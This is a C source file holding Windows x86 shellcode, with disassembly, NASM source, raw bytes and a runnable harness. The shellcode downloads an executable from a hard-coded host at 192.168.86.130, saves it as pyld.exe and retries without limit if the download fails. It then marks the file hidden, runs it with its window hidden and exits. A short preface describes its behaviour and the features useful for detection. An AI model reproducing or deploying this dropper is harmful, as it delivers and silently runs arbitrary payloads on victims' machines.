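/*
    Title     : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
    Date      : 12-07-2016
    Author    : Roziul Hasan Khan Shifat
    Tested on : Windows 7 x86
*/

/*
    Behaviour summary, read from the listings below:

      1. Reads the PEB pointer from fs:0x30, follows PEB.Ldr to the
         in-memory-order module list, and takes the base address stored in
         the third list entry, which the author's comments identify as
         kernel32.dll.
      2. Walks the kernel32 export name table comparing 12 bytes against
         "GetProcAddre" to locate GetProcAddress().
      3. Uses GetProcAddress() to resolve LoadLibraryA(), loads urlmon.dll,
         then resolves URLDownloadToFileA().
      4. Calls URLDownloadToFileA(NULL, url, "pyld.exe", 0, NULL) with the
         hard-coded URL http://192.168.86.130/sample.exe. The file name has
         no directory part, so it is relative to the host process's current
         directory. A non-zero return value jumps back and repeats the call
         with no delay and no retry limit.
      5. Calls SetFileAttributesA("pyld.exe", 2) (FILE_ATTRIBUTE_HIDDEN).
      6. Calls WinExec("pyld.exe", 0); a uCmdShow of 0 is SW_HIDE.
      7. Resolves and calls ExitProcess().

    What this leaves for detection and triage:

      - No API name and no URL is present as a contiguous string. Each one is
        assembled on the stack from 4-byte push immediates (opcode 0x68), so
        plain string searches over the bytes miss them; the dword constants
        in the listings are the stable static feature.
      - At run time the host process loads urlmon.dll, issues an HTTP request
        for the URL above (repeatedly if the download fails), writes
        pyld.exe, marks it hidden, starts it as a child process, and then
        exits.
*/

/*
Disassembly of section .text:

00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx

00000023 <count>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <count>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <count>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <count>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   31 f6                   xor    %esi,%esi
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 c0                   xor    %eax,%eax
  53:   50                      push   %eax
  54:   68 61 72 79 41          push   $0x41797261
  59:   68 4c 69 62 72          push   $0x7262694c
  5e:   68 4c 6f 61 64          push   $0x64616f4c
  63:   54                      push   %esp
  64:   51                      push   %ecx
  65:   ff d2                   call   *%edx
  67:   83 c4 0c                add    $0xc,%esp
  6a:   31 c9                   xor    %ecx,%ecx
  6c:   68 6c 6c 41 41          push   $0x41416c6c
  71:   88 4c 24 02             mov    %cl,0x2(%esp)
  75:   68 6f 6e 2e 64          push   $0x642e6e6f
  7a:   68 75 72 6c 6d          push   $0x6d6c7275
  7f:   54                      push   %esp
  80:   ff d0                   call   *%eax
  82:   83 c4 0c                add    $0xc,%esp
  85:   31 c9                   xor    %ecx,%ecx
  87:   68 65 41 42 42          push   $0x42424165
  8c:   88 4c 24 02             mov    %cl,0x2(%esp)
  90:   68 6f 46 69 6c          push   $0x6c69466f
  95:   68 6f 61 64 54          push   $0x5464616f
  9a:   68 6f 77 6e 6c          push   $0x6c6e776f
  9f:   68 55 52 4c 44          push   $0x444c5255
  a4:   54                      push   %esp
  a5:   50                      push   %eax
  a6:   ff d6                   call   *%esi
  a8:   83 c4 14                add    $0x14,%esp
  ab:   50                      push   %eax

000000ac <download>:
  ac:   58                      pop    %eax
  ad:   31 c9                   xor    %ecx,%ecx
  af:   51                      push   %ecx
  b0:   68 2e 65 78 65          push   $0x6578652e
  b5:   68 6d 70 6c 65          push   $0x656c706d
  ba:   68 30 2f 73 61          push   $0x61732f30
  bf:   68 36 2e 31 33          push   $0x33312e36
  c4:   68 36 38 2e 38          push   $0x382e3836
  c9:   68 39 32 2e 31          push   $0x312e3239
  ce:   68 3a 2f 2f 31          push   $0x312f2f3a
  d3:   68 68 74 74 70          push   $0x70747468
  d8:   54                      push   %esp
  d9:   59                      pop    %ecx
  da:   31 db                   xor    %ebx,%ebx
  dc:   53                      push   %ebx
  dd:   68 2e 65 78 65          push   $0x6578652e
  e2:   68 70 79 6c 64          push   $0x646c7970
  e7:   54                      push   %esp
  e8:   5b                      pop    %ebx
  e9:   31 d2                   xor    %edx,%edx
  eb:   50                      push   %eax
  ec:   52                      push   %edx
  ed:   52                      push   %edx
  ee:   53                      push   %ebx
  ef:   51                      push   %ecx
  f0:   52                      push   %edx
  f1:   ff d0                   call   *%eax
  f3:   59                      pop    %ecx
  f4:   83 c4 2c                add    $0x2c,%esp
  f7:   31 d2                   xor    %edx,%edx
  f9:   39 d0                   cmp    %edx,%eax
  fb:   51                      push   %ecx
  fc:   75 ae                   jne    ac <download>
  fe:   5a                      pop    %edx
  ff:   31 d2                   xor    %edx,%edx
 101:   68 73 41 42 42          push   $0x42424173
 106:   88 54 24 02             mov    %dl,0x2(%esp)
 10a:   68 62 75 74 65          push   $0x65747562
 10f:   68 74 74 72 69          push   $0x69727474
 114:   68 69 6c 65 41          push   $0x41656c69
 119:   68 53 65 74 46          push   $0x46746553
 11e:   54                      push   %esp
 11f:   57                      push   %edi
 120:   ff d6                   call   *%esi
 122:   83 c4 14                add    $0x14,%esp
 125:   31 c9                   xor    %ecx,%ecx
 127:   51                      push   %ecx
 128:   68 2e 65 78 65          push   $0x6578652e
 12d:   68 70 79 6c 64          push   $0x646c7970
 132:   54                      push   %esp
 133:   59                      pop    %ecx
 134:   31 d2                   xor    %edx,%edx
 136:   83 c2 02                add    $0x2,%edx
 139:   52                      push   %edx
 13a:   51                      push   %ecx
 13b:   ff d0                   call   *%eax
 13d:   83 c4 08                add    $0x8,%esp
 140:   31 c9                   xor    %ecx,%ecx
 142:   68 78 65 63 41          push   $0x41636578
 147:   88 4c 24 03             mov    %cl,0x3(%esp)
 14b:   68 57 69 6e 45          push   $0x456e6957
 150:   54                      push   %esp
 151:   57                      push   %edi
 152:   ff d6                   call   *%esi
 154:   83 c4 08                add    $0x8,%esp
 157:   31 c9                   xor    %ecx,%ecx
 159:   51                      push   %ecx
 15a:   68 2e 65 78 65          push   $0x6578652e
 15f:   68 70 79 6c 64          push   $0x646c7970
 164:   54                      push   %esp
 165:   59                      pop    %ecx
 166:   31 d2                   xor    %edx,%edx
 168:   52                      push   %edx
 169:   51                      push   %ecx
 16a:   ff d0                   call   *%eax
 16c:   83 c4 08                add    $0x8,%esp
 16f:   31 c9                   xor    %ecx,%ecx
 171:   68 65 73 73 41          push   $0x41737365
 176:   88 4c 24 03             mov    %cl,0x3(%esp)
 17a:   68 50 72 6f 63          push   $0x636f7250
 17f:   68 45 78 69 74          push   $0x74697845
 184:   54                      push   %esp
 185:   57                      push   %edi
 186:   ff d6                   call   *%esi
 188:   ff d0                   call   *%eax
*/

/*
; NASM source (Intel syntax, 32-bit). Quoted strings in the comments are the
; ASCII reading of the little-endian push immediates.

section .text
        global _start

_start:
        xor     ecx,ecx
        mov     eax,[fs:ecx+0x30]       ;Eax=PEB
        mov     eax,[eax+0xc]           ;eax=PEB.Ldr
        mov     esi,[eax+0x14]          ;esi=PEB.Ldr->InMemOrderModuleList
        lodsd
        xchg    esi,eax
        lodsd
        mov     ecx,[eax+0x10]          ;ecx=kernel32.dll base address

        ;------------------------------------
        mov     ebx,[ecx+0x3c]          ;kernel32.dll +0x3c=DOS->e_lfanew
        add     ebx,ecx                 ;ebx=PE HEADER
        mov     ebx,[ebx+0x78]          ;Data_DIRECTORY->VirtualAddress
        add     ebx,ecx                 ;IMAGE_EXPORT_DIRECTORY
        mov     esi,[ebx+0x20]          ;AddressOfNames
        add     esi,ecx

        ;------------------------------------------
        xor     edx,edx                 ;edx counts the names examined
count:
        inc     edx
        lodsd                           ;eax = next name RVA
        add     eax,ecx                 ;eax -> export name string
        cmp     dword [eax],'GetP'
        jnz     count
        cmp     dword [eax+4],'rocA'
        jnz     count
        cmp     dword [eax+8],'ddre'
        jnz     count

        ;---------------------------------------------
        mov     esi,[ebx+0x1c]          ;AddressOfFunctions
        add     esi,ecx
        mov     edx,[esi+edx*4]         ;edx is used directly as the table index
        add     edx,ecx                 ;edx=GetProcAddress()

        ;-----------------------------------------
        xor     esi,esi
        mov     esi,edx                 ;GetProcAddress()
        mov     edi,ecx                 ;kernel32.dll

        ;------------------------------------
        ;finding address of LoadLibraryA()
        xor     eax,eax
        push    eax                     ;string terminator
        push    0x41797261              ;"aryA"
        push    0x7262694c              ;"Libr"
        push    0x64616f4c              ;"Load"
        push    esp
        push    ecx
        call    edx                     ;GetProcAddress(kernel32, "LoadLibraryA")
        ;------------------------
        add     esp,12

        ;-----------------------------
        ;LoadLibraryA("urlmon.dll")
        xor     ecx,ecx
        push    0x41416c6c              ;"llAA"
        mov     [esp+2],byte cl         ;overwrite the first padding 'A' with NUL
        push    0x642e6e6f              ;"on.d"
        push    0x6d6c7275              ;"urlm"
        push    esp
        call    eax
        ;-----------------------
        add     esp,12

        ;-----------------------
        ;finding address of URLDownloadToFileA()
        xor     ecx,ecx
        push    0x42424165              ;"eABB"
        mov     [esp+2],byte cl         ;overwrite the first padding 'B' with NUL
        push    0x6c69466f              ;"oFil"
        push    0x5464616f              ;"oadT"
        push    0x6c6e776f              ;"ownl"
        push    0x444c5255              ;"URLD"
        push    esp
        push    eax                     ;module handle returned by LoadLibraryA
        call    esi
        ;------------------------
        add     esp,20
        push    eax

        ;---------------------------------------
        ;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
        pop     eax                     ;eax = URLDownloadToFileA
        xor     ecx,ecx
        push    ecx                     ;string terminator
        ;-----------------------------
        ;change it to file url
        push    0x6578652e              ;".exe"
        push    0x656c706d              ;"mple"
        push    0x61732f30              ;"0/sa"
        push    0x33312e36              ;"6.13"
        push    0x382e3836              ;"68.8"
        push    0x312e3239              ;"92.1"
        push    0x312f2f3a              ;"://1"
        push    0x70747468              ;"http"
        ;-----------------------------------
        push    esp
        pop     ecx                     ;url http://192.168.86.130/sample.exe
        xor     ebx,ebx
        push    ebx                     ;string terminator
        ;------------------------
        ;save as (no need change it.if U want to change it,do it)
        push    0x6578652e              ;".exe"
        push    0x646c7970              ;"pyld"
        ;-------------------------------
        push    esp                     ;pyld.exe
        pop     ebx                     ;save as
        xor     edx,edx
        push    eax                     ;keep the function address for a retry
        push    edx                     ;5th argument = NULL
        push    edx                     ;4th argument = 0
        push    ebx                     ;3rd argument = "pyld.exe"
        push    ecx                     ;2nd argument = url
        push    edx                     ;1st argument = NULL
        call    eax
        ;-------------------------
        pop     ecx                     ;ecx = saved function address
        add     esp,44
        xor     edx,edx
        cmp     eax,edx
        push    ecx
        jnz     download                ;if it fails to download , retry continuously
        ;------------------
        pop     edx

        ;-----------------------
        ;Finding address of SetFileAttributesA()
        xor     edx,edx
        push    0x42424173              ;"sABB"
        mov     [esp+2],byte dl         ;overwrite the first padding 'B' with NUL
        push    0x65747562              ;"bute"
        push    0x69727474              ;"ttri"
        push    0x41656c69              ;"ileA"
        push    0x46746553              ;"SetF"
        push    esp
        push    edi                     ;kernel32.dll
        call    esi
        ;--------------------------------
        add     esp,20                  ;U must adjust stack or it will crash

        ;--------------------
        ;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
        xor     ecx,ecx
        push    ecx                     ;string terminator
        push    0x6578652e              ;".exe"
        push    0x646c7970              ;"pyld"
        push    esp
        pop     ecx
        xor     edx,edx
        add     edx,2                   ;FILE_ATTRIBUTE_HIDDEN
        push    edx
        push    ecx
        call    eax
        ;-------------------
        add     esp,8

        ;---------------------------
        ;finding address of WinExec()
        xor     ecx,ecx
        push    0x41636578              ;"xecA"
        mov     [esp+3],byte cl         ;overwrite the padding 'A' with NUL
        push    0x456e6957              ;"WinE"
        push    esp
        push    edi                     ;kernel32.dll
        call    esi
        ;----------------------
        add     esp,8

        ;------------------------
        ;calling WinExec("pyld.exe",0)
        xor     ecx,ecx
        push    ecx                     ;string terminator
        push    0x6578652e              ;".exe"
        push    0x646c7970              ;"pyld"
        push    esp
        pop     ecx
        xor     edx,edx
        push    edx                     ;uCmdShow = 0 (SW_HIDE)
        push    ecx
        call    eax
        ;-------------------------
        add     esp,8

        ;-----------------------------
        ;finding address of ExitProcess()
        xor     ecx,ecx
        push    0x41737365              ;"essA"
        mov     [esp+3],byte cl         ;overwrite the padding 'A' with NUL
        push    0x636f7250              ;"Proc"
        push    0x74697845              ;"Exit"
        push    esp
        push    edi                     ;kernel32.dll
        call    esi
        ;--------------
        call    eax                     ;ExitProcess()
*/

#include <stdio.h>
#include <string.h>

/*
 * Assembled bytes of the listing above: 394 bytes, matching the disassembly,
 * whose last instruction ends at offset 0x18a. No byte is 0x00, which is why
 * strlen() in main() reports the full length.
 */
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";

/*
 * Harness: prints the byte count, then casts the array to a function pointer
 * and calls it.
 *
 * shellcode[] is an initialised, writable global. Where DEP/NX is enforced
 * for the process, the memory holding it is not executable and the call
 * faults instead of running the bytes.
 *
 * The listing ends in ExitProcess(), so the call is not expected to return;
 * the return statement only satisfies the int return type.
 */
int main(void)
{
    printf("shellcode length %ld\n",(long)strlen(shellcode));
    (* (int(*)()) shellcode) ();
    return 0;
}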